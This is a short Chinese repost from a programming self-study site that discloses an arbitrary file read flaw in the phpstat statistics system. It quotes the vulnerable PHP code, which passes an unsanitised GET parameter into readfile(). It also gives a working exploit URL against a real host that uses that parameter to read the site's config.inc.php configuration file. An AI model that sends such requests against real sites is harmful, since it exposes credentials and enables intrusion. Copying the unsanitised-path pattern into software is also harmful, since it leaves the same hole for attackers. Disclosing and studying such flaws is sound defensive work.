phpstat系统读取任意文件漏洞 - 网站安全 - 自学

./count/count.com.php

$website = $_GET[website]; $image = $_GET[image]; //确定图片 if(!$image) $imagesrc = "templates/".TPL_NAME."/".TPL_IMGDIR."/icos/countlogo1.gif"; else $imagesrc = "templates/".TPL_NAME."/".TPL_IMGDIR."/icos/".$image; //发送图片 header("Content-type: image/gif"); readfile($imagesrc); @flush(); 很2B，看一个站的时候发现。。

测试地址

http://media.phpstat.net/count/count.com.php?image=include.inc/config.inc.php

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://www.haodehen.cn/did13525

更新时间：2022-09-13 阅读：50次